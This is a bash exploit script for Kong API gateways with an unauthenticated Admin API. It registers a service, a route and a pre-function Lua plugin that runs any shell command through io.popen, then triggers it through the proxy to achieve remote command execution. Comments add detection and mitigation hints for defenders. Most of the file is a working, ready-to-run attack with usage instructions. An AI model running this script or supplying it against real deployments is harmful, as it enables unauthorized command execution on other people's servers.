#!/bin/bash
# Kong Public Exposed & Unauthorized API Exploit
# Using the API to achieve RCE (note that Kong is very likely running inside a container)
#
# Author: Li-Heng Yu (Jasper Yu) <[email protected]>
# Thu April 30, 2020
# MIT License
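# Exactly three positional arguments are required.  Usage goes to stderr and
# the exit status is non-zero so a caller (or a wrapper) can tell the usage
# error apart from a normal run; "$0" is quoted so a script path containing
# spaces is printed intact.
if [ $# -ne 3 ]; then
  printf 'Usage: %s <Kong API> <Kong Proxy Entry> <Command>\n' "$0" >&2
  printf 'Example: ./kong_exploit.sh "192.168.1.2:8001" "192.168.1.2:8000" "whoami"\n' >&2
  exit 2
fi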
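urlencode() {
# urlencode <string>
# Percent-encodes $1 and prints the result to stdout with no trailing
# newline.  RFC 3986 unreserved characters (A-Z a-z 0-9 . ~ _ -) pass
# through unchanged; every other byte is emitted as %XX (upper-case hex).
#
# LC_ALL (not just LC_COLLATE) is forced to C for the duration so that
# ${1:i:1} and ${#1} operate on bytes rather than multibyte characters;
# otherwise a non-ASCII character would be emitted as a single %XX of its
# code point instead of one %XX per UTF-8 byte.  The previous LC_ALL state
# (set or unset) is restored on return.  All loop state is local so the
# function leaves no stray globals behind.
  local had_lc_all="${LC_ALL+set}" old_lc_all="${LC_ALL-}"
  LC_ALL=C
  local length="${#1}"
  local i c
  for (( i = 0; i < length; i++ )); do
    c="${1:i:1}"
    case $c in
      # Data is passed as an argument, never as the printf format string.
      [a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
      # "'c" is the numeric value of the byte c.
      *) printf '%%%02X' "'$c" ;;
    esac
  done
  if [ -n "$had_lc_all" ]; then
    LC_ALL="$old_lc_all"
  else
    unset LC_ALL
  fi
}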
cleanup(){
# Tear down the route and the service created further down (both are
# named 'aaabbbccc').  Reads the global api_host, which is assigned after
# this definition but before the function is ever invoked.  Called from
# the SIGINT/SIGTERM trap and again explicitly at the end of the script.
# curl's exit status is not checked, so a failed DELETE silently leaves
# the objects in place -- for responders, a service/route/plugin carrying
# this name in Kong's Admin API state is the residue to look for.
# Delete the route
curl -X DELETE "$api_host"'/routes/aaabbbccc'
# Delete the service
curl -X DELETE "$api_host"'/services/aaabbbccc'
}
# ---------------------------------------------------------------------
# Main flow.  Two endpoints are involved: the Kong Admin API ($api_host),
# used to write configuration, and the Kong proxy ($proxy_host), used to
# make that configuration run.  The single precondition is that the Admin
# API answers without authentication.  Mitigation is therefore at the
# deployment level: keep admin_listen on loopback or a management network
# (or behind an authenticating front-end), and alert on Admin API write
# requests from unexpected sources.
# ---------------------------------------------------------------------
# cleanup is registered for Ctrl-C / TERM only -- nothing for EXIT or ERR.
# If a curl call below fails without a signal, the objects stay until the
# explicit cleanup call at the bottom; a hard kill leaves them for good.
trap cleanup SIGINT SIGTERM
api_host="$1"    # Admin API base (host:port as given; no scheme is added here)
proxy_host="$2"  # proxy listener base
cmd="$3"         # command string embedded in the Lua plugin body below
# Create a new service
# Registers a service named aaabbbccc.  The upstream host/port on this line
# is hard-coded; presumably it is never contacted because the plugin below
# ends the request itself -- confirm against Kong's pre-function semantics.
curl -X POST "$api_host"'/services' -F 'protocol=http' -F 'name=aaabbbccc' -F 'host=140.113.170.76' -F 'port=80' -F 'path=/' -o /dev/null -s
sleep 0.2  # short pause before the dependent route creation (inferred)
# Create a new route
# Routes proxy requests for /aaabbbccc to the service just created.
curl -X POST "$api_host"'/routes' -F 'name=aaabbbccc' -F 'protocols=http' -F 'paths=/aaabbbccc' -F 'service.name=aaabbbccc' -o /dev/null -s
sleep 0.2
# Add Pre-function Plugin for the service
# Installs a pre-function plugin whose Lua body runs $cmd through
# io.popen() and returns the captured output as the HTTP response via
# kong.response.exit(200, ...).  Detection: an Admin API POST to
# /services/<name>/plugins with name=pre-function, or a persisted plugin
# whose config.functions contains io.popen/os.execute, is a high-signal
# indicator; check Kong's access logs and the configured datastore for it.
curl -X POST "$api_host"'/services/aaabbbccc/plugins' --data "name=pre-function&config.functions="$(urlencode 'local handle = io.popen("'"$cmd"'"); local result = handle:read("*a"); handle:close(); return kong.response.exit(200, result)') -o /dev/null -s
sleep 1  # give the proxy side time to pick up the new plugin (inferred)
# Trigger the exploit
# One proxied request to the route executes the plugin; --max-time bounds
# the wait if the command never returns.
curl --max-time 3 "$proxy_host"'/aaabbbccc'
# Explicit teardown on the normal exit path (the trap covers signals only).
cleanup